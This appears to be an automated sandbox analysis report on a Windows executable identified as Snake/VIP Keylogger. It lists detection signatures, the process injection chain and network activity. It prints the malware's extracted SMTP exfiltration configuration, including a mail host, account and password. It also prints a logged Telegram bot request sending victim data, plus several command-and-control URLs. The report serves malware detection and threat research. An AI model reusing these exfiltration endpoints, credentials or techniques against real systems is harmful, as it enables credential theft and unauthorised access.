Windows Analysis Report
7DI4iYwcvw.exe

Overview

General Information

Sample name: 7DI4iYwcvw.exe (renamed because the original name is a hash value)
Original sample name: 2b4eae5d8282eacacd17d2fdec8bf3e052baa7e7f60276854b9c077183aa2176.exe
Analysis ID: 1529912
MD5: e142f0bf6c0d9be52f8c7f52007c64d0
SHA1: 36d40ea847e5f16424951fc9a5bd19f739705c87
SHA256: 2b4eae5d8282eacacd17d2fdec8bf3e052baa7e7f60276854b9c077183aa2176
Tags: exe, SnakeKeylogger, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 7DI4iYwcvw.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\7DI4iYwcvw.exe" MD5: E142F0BF6C0D9BE52F8C7F52007C64D0)
    • RegSvcs.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\7DI4iYwcvw.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
Extracted configuration (VIP Keylogger): {"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
Extracted configuration (Snake Keylogger): {"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
Source | Rule | Description | Author | Strings
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
2.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | matched strings:
  • 0x2df83:$a1: get_encryptedPassword
  • 0x2e2a0:$a2: get_encryptedUsername
  • 0x2dd93:$a3: get_timePasswordChanged
  • 0x2de9c:$a4: get_passwordField
  • 0x2df99:$a5: set_encryptedPassword
  • 0x2f639:$a7: get_logins
  • 0x2f59c:$a10: KeyLoggerEventArgs
  • 0x2f201:$a11: KeyLoggerEventArgsEventHandler

System Summary

Source: Network Connection | Author: frack113 | Data: DestinationIp: 46.151.208.21, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7020, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49736

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-09T14:45:17.147222+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.12 | 49713 | 188.114.96.3 | 443 | TCP
2024-10-09T14:45:19.102713+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.12 | 49715 | 188.114.96.3 | 443 | TCP
2024-10-09T14:45:23.944483+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.12 | 49722 | 188.114.96.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-09T14:45:15.644619+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.12 | 49711 | 193.122.6.168 | 80 | TCP
2024-10-09T14:45:16.566496+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.12 | 49711 | 193.122.6.168 | 80 | TCP
2024-10-09T14:45:17.798405+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.12 | 49714 | 193.122.6.168 | 80 | TCP

AV Detection

Source: 7DI4iYwcvw.exe | Avira: detected
Source: 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
Source: 2.2.RegSvcs.exe.400000.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
Source: 7DI4iYwcvw.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 7DI4iYwcvw.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: 7DI4iYwcvw.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49712 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49733 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49735 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00FDF45Dh | 2_2_00FDF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00FDF45Dh | 2_2_00FDF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00FDFC19h | 2_2_00FDF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061BE0A9h | 2_2_061BDE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061B31E0h | 2_2_061B2DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061B0D0Dh | 2_2_061B0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061B1697h | 2_2_061B0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061B2C19h | 2_2_061B2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061BE959h | 2_2_061BE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061BF209h | 2_2_061BEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061BCF49h | 2_2_061BCCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061BD7F9h | 2_2_061BD550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061B31E0h | 2_2_061B2DC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061BE501h | 2_2_061BE258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061BEDB1h | 2_2_061BEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061BF661h | 2_2_061BF3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061BFAB9h | 2_2_061BF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 2_2_061B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061BD3A1h | 2_2_061BD0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061B31E0h | 2_2_061B310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061BDC51h | 2_2_061BD9A8

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.12:49736 -> 46.151.208.21:587
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2009/10/2024%20/%2023:08:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 193.122.6.168
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49714 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49711 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49713 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49715 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49722 -> 188.114.96.3:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49712 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49733 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: mail.irco.com.sa
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 09 Oct 2024 12:45:29 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.4794609569.0000000000C36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegSvcs.exe, 00000002.00000002.4794763868.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enM
Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.0000000002935000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.irco.com.sa
Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20a
Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000002.00000002.4794997601.000000000299E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.0000000002999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.00000000029CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000002.00000002.4794997601.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.000000000282E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000002.00000002.4794997601.000000000282E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.4794997601.000000000282E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: RegSvcs.exe, 00000002.00000002.4794997601.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.0000000002857000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000029CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49735 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 7DI4iYwcvw.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@4/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | File created: C:\Users\user\AppData\Local\Temp\juvenilely
                    Source: 7DI4iYwcvw.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.0000000002A96000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 7DI4iYwcvw.exe | ReversingLabs: Detection: 65%
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | File read: C:\Users\user\Desktop\7DI4iYwcvw.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\7DI4iYwcvw.exe "C:\Users\user\Desktop\7DI4iYwcvw.exe"
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7DI4iYwcvw.exe"
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: 7DI4iYwcvw.exe | Static file information: File size 1257083 > 1048576
                    Source: 7DI4iYwcvw.exe | Static PE information: real checksum: 0xa961f should be: 0x13c5fa
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00FD9C30 push esp; retf 0271h (2_2_00FD9D55)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00FD891E pushad ; iretd (2_2_00FD891F)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_061B9243 push es; ret (2_2_061B9244)
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe | API/Special instruction interceptor: Address: 403A264
